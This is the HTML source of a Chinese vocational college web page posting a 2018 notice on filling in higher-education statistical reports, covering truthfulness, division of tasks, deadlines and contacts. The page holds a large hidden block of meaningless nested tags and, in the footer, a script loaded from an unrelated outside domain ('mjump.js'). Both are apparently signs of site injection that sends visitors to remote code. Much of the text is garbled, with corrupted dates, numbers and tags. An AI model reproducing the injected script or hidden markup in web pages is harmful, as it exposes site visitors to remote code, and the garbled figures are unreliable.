cu 关于做好2018年高等教育事业统计报表填报工作的通知和要{}郑州城市职业学院-评估办公定/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><td id='o2y8a'></td><small id='o2y8a'></small><dd id='o2y8a'><dl id='o2y8a'></dl><big id='o2y8a'></big></dd><font id='o2y8a'></font><strike id='o2y8a'></strike><table id='o2y8a'></table><strong id='o2y8a'><ol id='o2y8a'></ol></strong><tr id='o2y8a'><table id='o2y8a'><strike id='o2y8a'></strike><form id='o2y8a'></form><tbody id='o2y8a'></tbody></table><dl id='o2y8a'><sub id='o2y8a'></sub><tfoot id='o2y8a'><tbody id='o2y8a'><address id='o2y8a'><blockquote id='o2y8a'></blockquote></address></tbody></tfoot></dl></tr><address id='o2y8a'></address><dd id='o2y8a'></dd><dd id='o2y8a'><span id='o2y8a'></span></dd><label id='o2y8a'><center id='o2y8a'><dl id='o2y8a'><p id='o2y8a'></p></dl><label id='o2y8a'><b id='o2y8a'></b></label></center></label><small id='o2y8a'></small><abbr id='o2y8a'></abbr><ins id='o2y8a'><q id='o2y8a'></q><fieldset id='o2y8a'><thead id='o2y8a'><div id='o2y8a'><q id='o2y8a'></q></div></thead></fieldset></ins><u id='o2y8a'></u><code id='o2y8a'></code><table id='o2y8a'><dt id='o2y8a'></dt></table><tt id='o2y8a'></tt><center id='o2y8a'></center><strike id='o2y8a'><u id='o2y8a'></u></strike><dir id='o2y8a'><b id='o2y8a'></b><dfn id='o2y8a'></dfn><dd id='o2y8a'></dd><tfoot id='o2y8a'></tfoot></dir><big id='o2y8a'></big><tfoot id='o2y8a'></tfoot><sub id='o2y8a'></sub><noframes id='o2y8a'></noframes><strong id='o2y8a'><q id='o2y8a'><th id='o2y8a'></th><dt id='o2y8a'></dt></q></strong><fieldset id='o2y8a'><b id='o2y8a'></b><fieldset id='o2y8a'><dd id='o2y8a'></dd></fieldset></fieldset><table id='o2y8a'></table><small id='o2y8a'><button id='o2y8a'><li id='o2y8a'></li></button></small><table id='o2y8a'><optgroup id='o2y8a'></optgroup><th id='o2y8a'></th></table><ul id='o2y8a'></ul><select id='o2y8a'></select><tbody id='o2y8a'></tbody><label id='o2y8a'></label><select id='o2y8a'><dd id='o2y8a'><p id='o2y8a'></p></dd></select><center id='o2y8a'><th id='o2y8a'></th></center><dir id='o2y8a'></dir><table id='o2y8a'></table><label id='o2y8a'></label><bdo id='o2y8a'><tt id='o2y8a'><kbd id='o2y8a'></kbd></tt></bdo><b id='o2y8a'><style id='o2y8a'><option id='o2y8a'><kbd id='o2y8a'><dd id='o2y8a'><dd id='o2y8a'></dd></dd></kbd></option><blockquote id='o2y8a'></blockquote></style></b><dt id='o2y8a'><button id='o2y8a'></button></dt><dfn id='o2y8a'></dfn><small id='o2y8a'></small><label id='o2y8a'><del id='o2y8a'><dd id='o2y8a'><code id='o2y8a'></code><acronym id='o2y8a'><center id='o2y8a'></center><tbody id='o2y8a'><thead id='o2y8a'><ins id='o2y8a'></ins></thead></tbody><ins id='o2y8a'><em id='o2y8a'><button id='o2y8a'></button></em></ins></acronym></dd></del></label><option id='o2y8a'></option><u id='o2y8a'></u><strong id='o2y8a'></strong><strike id='o2y8a'><fieldset id='o2y8a'><small id='o2y8a'><thead id='o2y8a'></thead></small></fieldset></strike><label id='o2y8a'><u id='o2y8a'></u><del id='o2y8a'></del></label><sub id='o2y8a'></sub><strike id='o2y8a'></strike><tbody id='o2y8a'><small id='o2y8a'></small><pre id='o2y8a'></pre></tbody><u id='o2y8a'></u><table id='o2y8a'></table><p id='o2y8a'></p><td id='o2y8a'></td><code id='o2y8a'></code><del id='o2y8a'><style id='o2y8a'><option id='o2y8a'><fieldset id='o2y8a'></fieldset><tt id='o2y8a'></tt></option></style></del><legend id='o2y8a'><kbd id='o2y8a'><acronym id='o2y8a'><bdo id='o2y8a'><strike id='o2y8a'><span id='o2y8a'></span></strike></bdo></acronym></kbd></legend><del id='o2y8a'></del><option id='o2y8a'><ins id='o2y8a'></ins></option><table id='o2y8a'><span id='o2y8a'></span><sub id='o2y8a'><tt id='o2y8a'></tt></sub></table><small id='o2y8a'><ol id='o2y8a'><strong id='o2y8a'><kbd id='o2y8a'><code id='o2y8a'><option id='o2y8a'></option><u id='o2y8a'><center id='o2y8a'></center></u></code></kbd></strong><li id='o2y8a'><i id='o2y8a'></i></li></ol></small><noframes id='o2y8a'><dir id='o2y8a'><del id='o2y8a'><del id='o2y8a'></del><pre id='o2y8a'><pre id='o2y8a'><option id='o2y8a'><address id='o2y8a'></address><bdo id='o2y8a'><tr id='o2y8a'><acronym id='o2y8a'><pre id='o2y8a'></pre></acronym><div id='o2y8a'></div></tr></bdo></option></pre><small id='o2y8a'><address id='o2y8a'><u id='o2y8a'><legend id='o2y8a'><option id='o2y8a'><abbr id='o2y8a'></abbr><li id='o2y8a'><pre id='o2y8a'></pre></li></option></legend><select id='o2y8a'></select></u></address></small></pre></del><sup id='o2y8a'></sup><blockquote id='o2y8a'><dt id='o2y8a'></dt></blockquote><blockquote id='o2y8a'></blockquote></dir><tt id='o2y8a'></tt><u id='o2y8a'><tt id='o2y8a'><form id='o2y8a'></form></tt><td id='o2y8a'><dt id='o2y8a'></dt></td></u></noframes><optgroup id='o2y8a'><tfoot id='o2y8a'></tfoot></optgroup><pre id='o2y8a'><tfoot id='o2y8a'><address id='o2y8a'></address><blockquote id='o2y8a'></blockquote></tfoot></pre><strong id='o2y8a'><option id='o2y8a'><option id='o2y8a'><style id='o2y8a'></style></option></option></strong><tr id='o2y8a'></tr><form id='o2y8a'></form><form id='o2y8a'><form id='o2y8a'></form><ol id='o2y8a'><sup id='o2y8a'></sup></ol></form><th id='o2y8a'></th><td id='o2y8a'></td><code id='o2y8a'><li id='o2y8a'><dl id='o2y8a'><button id='o2y8a'><sub id='o2y8a'><span id='o2y8a'><ins id='o2y8a'></ins></span></sub></button><li id='o2y8a'><li id='o2y8a'><form id='o2y8a'></form><blockquote id='o2y8a'></blockquote></li><code id='o2y8a'></code><dir id='o2y8a'><noframes id='o2y8a'></noframes></dir><kbd id='o2y8a'></kbd><dir id='o2y8a'></dir></li><td id='o2y8a'><tfoot id='o2y8a'></tfoot></td></dl></li></code><tbody id='o2y8a'><small id='o2y8a'></small><kbd id='o2y8a'><select id='o2y8a'><tt id='o2y8a'><p id='o2y8a'></p><address id='o2y8a'></address></tt></select></kbd></tbody><pre id='o2y8a'></pre><tr id='o2y8a'></tr><noframes id='o2y8a'><code id='o2y8a'><i id='o2y8a'><q id='o2y8a'><legend id='o2y8a'><pre id='o2y8a'><style id='o2y8a'><acronym id='o2y8a'><i id='o2y8a'><form id='o2y8a'><option id='o2y8a'><center id='o2y8a'></center></option></form></i></acronym></style><tt id='o2y8a'></tt></pre></legend></q></i></code><center id='o2y8a'></center></noframes><thead id='o2y8a'><sub id='o2y8a'></sub></thead><sup id='o2y8a'><div id='o2y8a'></div></sup><td id='o2y8a'><dd id='o2y8a'><fieldset id='o2y8a'><code id='o2y8a'><blockquote id='o2y8a'><tfoot id='o2y8a'></tfoot></blockquote></code><td id='o2y8a'></td></fieldset></dd><tr id='o2y8a'><label id='o2y8a'><dir id='o2y8a'></dir></label></tr></td><style id='o2y8a'></style><option id='o2y8a'></option><legend id='o2y8a'><fieldset id='o2y8a'><u id='o2y8a'></u></fieldset><strike id='o2y8a'><td id='o2y8a'></td><tfoot id='o2y8a'></tfoot><u id='o2y8a'><tr id='o2y8a'></tr></u></strike></legend><fieldset id='o2y8a'><dir id='o2y8a'><form id='o2y8a'><optgroup id='o2y8a'></optgroup></form></dir><font id='o2y8a'><dl id='o2y8a'></dl></font></fieldset><blockquote id='o2y8a'></blockquote><style id='o2y8a'></style><p id='o2y8a'></p><label id='o2y8a'><ol id='o2y8a'><sub id='o2y8a'><noscript id='o2y8a'><code id='o2y8a'></code></noscript><td id='o2y8a'><tr id='o2y8a'><b id='o2y8a'><dl id='o2y8a'><ol id='o2y8a'></ol></dl></b></tr></td><dt id='o2y8a'></dt></sub></ol><address id='o2y8a'></address></label><legend id='o2y8a'><pre id='o2y8a'><style id='o2y8a'><acronym id='o2y8a'></acronym><ul id='o2y8a'><u id='o2y8a'></u><table id='o2y8a'><acronym id='o2y8a'><tt id='o2y8a'><blockquote id='o2y8a'></blockquote></tt></acronym><big id='o2y8a'></big></table><noframes id='o2y8a'><font id='o2y8a'></font></noframes></ul></style></pre></legend><p id='o2y8a'></p><dfn id='o2y8a'><blockquote id='o2y8a'></blockquote><u id='o2y8a'><ol id='o2y8a'><bdo id='o2y8a'></bdo></ol></u></dfn><acronym id='o2y8a'><noscript id='o2y8a'></noscript></acronym><i id='o2y8a'></i><button id='o2y8a'><ol id='o2y8a'></ol><legend id='o2y8a'></legend></button><label id='o2y8a'></label><ol id='o2y8a'></ol><address id='o2y8a'><legend id='o2y8a'><u id='o2y8a'><font id='o2y8a'><tt id='o2y8a'></tt><strong id='o2y8a'><span id='o2y8a'><q id='o2y8a'></q></span></strong></font></u><u id='o2y8a'></u></legend></address><ins id='o2y8a'></ins><q id='o2y8a'><address id='o2y8a'><option id='o2y8a'></option></address></q><p id='o2y8a'></p><dd id='o2y8a'></dd><td id='o2y8a'><style id='o2y8a'></style></td><em id='o2y8a'><optgroup id='o2y8a'></optgroup><address id='o2y8a'><tfoot id='o2y8a'><address id='o2y8a'></address></tfoot></address></em><p id='o2y8a'><table id='o2y8a'><option id='o2y8a'></option><tt id='o2y8a'></tt></table></p><ins id='o2y8a'><style id='o2y8a'><tbody id='o2y8a'><span id='o2y8a'><thead id='o2y8a'></thead></span><li id='o2y8a'><button id='o2y8a'></button></li><del id='o2y8a'><div id='o2y8a'><small id='o2y8a'></small></div><i id='o2y8a'></i></del></tbody></style><noscript id='o2y8a'><thead id='o2y8a'><tr id='o2y8a'></tr></thead></noscript></ins><p id='o2y8a'><dd id='o2y8a'><button id='o2y8a'></button><del id='o2y8a'><label id='o2y8a'><b id='o2y8a'></b><li id='o2y8a'></li></label><big id='o2y8a'></big></del><pre id='o2y8a'><tbody id='o2y8a'><style id='o2y8a'><dt id='o2y8a'></dt></style><legend id='o2y8a'><noframes id='o2y8a'><dd id='o2y8a'></dd></noframes></legend></tbody><button id='o2y8a'></button></pre><li id='o2y8a'><span id='o2y8a'></span></li></dd></p><li id='o2y8a'></li><fieldset id='o2y8a'><ol id='o2y8a'></ol></fieldset><kbd id='o2y8a'></kbd><small id='o2y8a'><b id='o2y8a'><optgroup id='o2y8a'></optgroup><div id='o2y8a'></div></b><div id='o2y8a'></div></small><u id='o2y8a'></u><big id='o2y8a'><ul id='o2y8a'></ul></big><button id='o2y8a'><sup id='o2y8a'><ol id='o2y8a'></ol><strong id='o2y8a'></strong></sup></button><option id='o2y8a'></option><tr id='o2y8a'></tr><b id='o2y8a'><div id='o2y8a'></div></b><tbody id='o2y8a'><acronym id='o2y8a'><acronym id='o2y8a'></acronym></acronym><dfn id='o2y8a'></dfn></tbody><ol id='o2y8a'><kbd id='o2y8a'></kbd></ol><kbd id='o2y8a'><em id='o2y8a'><dir id='o2y8a'><thead id='o2y8a'></thead></dir></em></kbd><table id='o2y8a'></table><select id='o2y8a'></select><table id='o2y8a'></table><sup id='o2y8a'></sup><bdo id='o2y8a'></bdo><noscript id='o2y8a'><dfn id='o2y8a'><fieldset id='o2y8a'><button id='o2y8a'></button></fieldset></dfn></noscript><thead id='o2y8a'></thead><table id='o2y8a'></table><font id='o2y8a'></font><button id='o2y8a'></button><legend id='o2y8a'><p id='o2y8a'><select id='o2y8a'></select><abbr id='o2y8a'></abbr></p></legend><del id='o2y8a'><del id='o2y8a'></del></del><dt id='o2y8a'></dt><blockquote id='o2y8a'></blockquote><strike id='o2y8a'></strike><button id='o2y8a'></button><u id='o2y8a'></u><legend id='o2y8a'><del id='o2y8a'><i id='o2y8a'></i></del></legend><noframes id='o2y8a'></noframes><tbody id='o2y8a'></tbody><dir id='o2y8a'><dir id='o2y8a'><select id='o2y8a'></select></dir></dir><font id='o2y8a'></font><u id='o2y8a'></u><bdo id='o2y8a'><optgroup id='o2y8a'></optgroup></bdo><sub id='o2y8a'></sub><tr id='o2y8a'><font id='o2y8a'><tbody id='o2y8a'><dfn id='o2y8a'></dfn></tbody></font></tr><font id='o2y8a'></font><table id='o2y8a'><blockquote id='o2y8a'><em id='o2y8a'><dl id='o2y8a'><acronym id='o2y8a'><code id='o2y8a'><thead id='o2y8a'></thead><bdo id='o2y8a'><option id='o2y8a'></option></bdo></code></acronym></dl></em></blockquote></table><button id='o2y8a'></button><legend id='o2y8a'><tt id='o2y8a'></tt><li id='o2y8a'></li></legend><pre id='o2y8a'></pre><center id='o2y8a'><label id='o2y8a'><dl id='o2y8a'><td id='o2y8a'></td></dl></label><abbr id='o2y8a'></abbr></center><del id='o2y8a'><noscript id='o2y8a'></noscript><thead id='o2y8a'></thead></del><ol id='o2y8a'><noscript id='o2y8a'><tbody id='o2y8a'><acronym id='o2y8a'></acronym></tbody></noscript><b id='o2y8a'></b><dt id='o2y8a'></dt><option id='o2y8a'></option></ol><strong id='o2y8a'><button id='o2y8a'></button></strong><sub id='o2y8a'></sub><del id='o2y8a'><strong id='o2y8a'><td id='o2y8a'></td></strong><p id='o2y8a'><button id='o2y8a'><ul id='o2y8a'><dfn id='o2y8a'></dfn><label id='o2y8a'></label></ul></button></p></del><acronym id='o2y8a'><form id='o2y8a'><noframes id='o2y8a'></noframes></form><th id='o2y8a'><u id='o2y8a'><small id='o2y8a'><span id='o2y8a'></span></small></u><tr id='o2y8a'><abbr id='o2y8a'><strike id='o2y8a'></strike></abbr></tr></th></acronym><strike id='o2y8a'><button id='o2y8a'><td id='o2y8a'><select id='o2y8a'><li id='o2y8a'><sub id='o2y8a'><style id='o2y8a'></style><tfoot id='o2y8a'></tfoot></sub></li></select></td></button></strike><label id='o2y8a'></label><span id='o2y8a'><u id='o2y8a'></u></span><style id='o2y8a'><bdo id='o2y8a'><noscript id='o2y8a'><b id='o2y8a'></b></noscript><thead id='o2y8a'><dt id='o2y8a'><form id='o2y8a'></form></dt></thead></bdo><button id='o2y8a'><form id='o2y8a'><del id='o2y8a'></del></form><q id='o2y8a'><address id='o2y8a'><ol id='o2y8a'><acronym id='o2y8a'><label id='o2y8a'><span id='o2y8a'><li id='o2y8a'></li><font id='o2y8a'><span id='o2y8a'></span></font><b id='o2y8a'></b></span></label><button id='o2y8a'></button><big id='o2y8a'></big><form id='o2y8a'><div id='o2y8a'><dir id='o2y8a'><strong id='o2y8a'><label id='o2y8a'></label></strong></dir></div></form><dt id='o2y8a'></dt><tt id='o2y8a'></tt></acronym><li id='o2y8a'><li id='o2y8a'><dt id='o2y8a'><acronym id='o2y8a'></acronym></dt></li></li></ol></address><sub id='o2y8a'></sub></q></button><table id='o2y8a'></table></style><td id='o2y8a'><dd id='o2y8a'></dd></td><label id='o2y8a'></label><button id='o2y8a'><td id='o2y8a'></td></button><table id='o2y8a'><select id='o2y8a'><label id='o2y8a'><tr id='o2y8a'></tr><noframes id='o2y8a'></noframes><select id='o2y8a'><small id='o2y8a'></small></select></label></select></table><span id='o2y8a'></span><label id='o2y8a'></label><tfoot id='o2y8a'></tfoot><abbr id='o2y8a'></abbr><option id='o2y8a'><button id='o2y8a'><tbody id='o2y8a'><strike id='o2y8a'><select id='o2y8a'></select></strike></tbody></button></option><abbr id='o2y8a'><option id='o2y8a'></option><u id='o2y8a'><b id='o2y8a'></b></u></abbr><font id='o2y8a'></font><form id='o2y8a'></form><ins id='o2y8a'><noframes id='o2y8a'></noframes><pre id='o2y8a'><u id='o2y8a'><i id='o2y8a'><em id='o2y8a'><option id='o2y8a'></option></em></i></u><ol id='o2y8a'><kbd id='o2y8a'><span id='o2y8a'></span><abbr id='o2y8a'><i id='o2y8a'><ins id='o2y8a'></ins></i></abbr></kbd></ol></pre></ins><optgroup id='o2y8a'></optgroup><noframes id='o2y8a'><style id='o2y8a'></style><sub id='o2y8a'><dfn id='o2y8a'><abbr id='o2y8a'><big id='o2y8a'><bdo id='o2y8a'></bdo></big></abbr></dfn></sub></noframes><strike id='o2y8a'></strike><td id='o2y8a'></td><sub id='o2y8a'><center id='o2y8a'></center><abbr id='o2y8a'></abbr><noframes id='o2y8a'><dir id='o2y8a'></dir></noframes></sub><tfoot id='o2y8a'></tfoot><style id='o2y8a'></style><legend id='o2y8a'><tfoot id='o2y8a'><b id='o2y8a'></b><q id='o2y8a'><del id='o2y8a'><style id='o2y8a'><address id='o2y8a'></address></style><kbd id='o2y8a'><li id='o2y8a'></li><small id='o2y8a'></small></kbd></del></q><small id='o2y8a'><strike id='o2y8a'></strike></small></tfoot><dd id='o2y8a'><tt id='o2y8a'><strong id='o2y8a'><big id='o2y8a'></big></strong></tt></dd></legend><form id='o2y8a'></form><style id='o2y8a'></style></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置?a href="/pgw/">首页</a> > 最新公> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公定/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>最新公/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>关于做好2018年高等教育事业统计报表填报工作的通知和要G/h1> <div class="info">发布时间?0180pt4日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=2790"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p align="center" style="margin-bottom:23.4pt;text-align:center;"> 关于做好2018年高等教育事业统计报表填报工作的通知和要G/p> <p align="left" style="margin-left:36pt;text-indent:-36pt;"> <strong>一、ڌ</strong> <strong>填报原则</strong> </p> <p align="left" style="text-indent:28pt;">《高等教育基层统计报表》的数据是教育部核定学校基本办学条件的主要依据。报表填制工作要坚持实事求是的原则,各项数据必须真实、可靠,不得虚报、瞒报、漏报、误报G/p> <p align="left" style="margin-left:36pt;text-indent:-36pt;"> <strong>二、ڌ</strong> <strong>任务分工</strong> </p> <p align="left" style="margin-bottom:7.8pt;">    详见<strong><u>附件</u></strong><strong><u>1</u></strong><strong><u>?/u></strong><strong><u>郑州城市职业学院</u></strong><strong><u>2018</u></strong><strong><u>年高等教育事业填报工作任务分解表</u></strong></p> <p align="left"> <strong>三〥/strong> <strong>填报要求</strong> </p> <p align="left" style="text-indent:28pt;">1、统计时期为2017pt日至2018幪朒1日,统计时点.6018pt日。各部门负责人及统计人员请加入学院内部教育事业统计群,QQ群号33960404G/p> <p align="left" style="text-indent:28pt;">2、各部门所填报内容务必017年数据保持连续性和一致性,今年主要数据增减比例过大的,须书面说明原因G/p> <p align="left" style="text-indent:28pt;">3、涉及同一张表格由多个部门提供数据的,数据统一汇总至填报部门,由填报部门集中提交至评估办G/p> <p align="left" style="text-indent:28pt;">4、各填报部门请于10未e6日下午下班前,纸质统计报表经部门主要负责人审定、签字,加盖部门公章,交至科研处郑子申老师处,电子版发送至科研处郑子申老师OAG/p> <p align="left" style="text-indent:28pt;">5、各有关部门提交汇总数据后应保存好数据来源的底册和台账,以便核查G/p> <p align="left" style="text-indent:28pt;"> </p> <p align="left" style="margin-left:36pt;text-indent:-36pt;"> <strong>三、ڌ</strong> <strong>注意事项</strong> </p> <p align="left">   1、今年部分表有变化,112表31表41表〦41表〦43表有较大的变化。每张报表涉及的指标均有明确的指标解释,填报人员在填报前请认真阅译V<u>附件2?018年高基报表填报说##/u>,按照指标解释的内涵,准确、完整地填报G/p> <p align="left" style="text-indent:28pt;">2、要把招生数核准。招生数是实际报到数,不是计划数也不是录取数,填报时要充分参照教务处学籍管理部门注册人数。注意成人专科招生数与教务处是否一致G/p> <p align="left" style="text-indent:28pt;">3、要把在校生人数核准1113表全日制专科|13成人专科分清楚,各填各表。其次要注意在校生的变动情况,毕业、结业、休学、退学、转出等在校生变动情况要准确G/p> <p align="left" style="text-indent:28pt;">4、要把教职工数核准。人事处要根据学校与聘任制人员签订的用工合同和缴纳的“五险一金”情况填报G/p> <p align="left" style="text-indent:28pt;">5、办学条件一定要核准。总务处在统计填报过程中,一定要账物相符、账实相符、账表相符。在统计校舍过程中,总务处需提供房产统计表,面积、房产证号、名称、所在位置,一定要准确细致G/p> <p align="left" style="text-indent:28pt;">6、对于图书、资产、信息化建设,一定要看准单位。有些是元,有些是万元,有些是个,有些是GB,一定要准确无误G/p> <p align="left" style="text-indent:27pt;"> </p> <p align="left" style="text-indent:27pt;"> </p> <p align="left">填报过程中有任何疑问或需求,请及时联系G/p> <p align="left">联系人:郑子申老师</p> <p align="left">联系电话?9210011L011)¢/p> <p align="left" style="text-indent:70pt;">13703932618</p> <p align="left" style="text-indent:70pt;"> </p> <p align="left"> </p> <p align="left"> <a href="/UploadFiles/pgw/2018/10/201810141412296028.doc">附件1:郑州城市职业学?018年高等教育事业填报工作任务分解表</a> </p> <p align="left">附件2?018年高基报表填报说##/p> <p align="left">附件3?018年河南省高等教育学校(机构)统计报表讲解</p> <p align="left">附件4:郑州城市职业学?018年高基报表(空白表)</p> <p align="left" style="text-indent:27pt;"> </p> <p align="left" style="text-indent:27pt;"> </p> <p align="right" style="text-align:right;text-indent:27.0pt;">                                     科研处、评估办公室</p> <p align="right" style="text-align:right;text-indent:27.0pt;">                                  20180pt0L/p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编?52370 电话?371-69213333 <br> 豫ICP夣S2014925另R </div> <script type="text/javascript" src="https://js.users.51.la/19550489.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>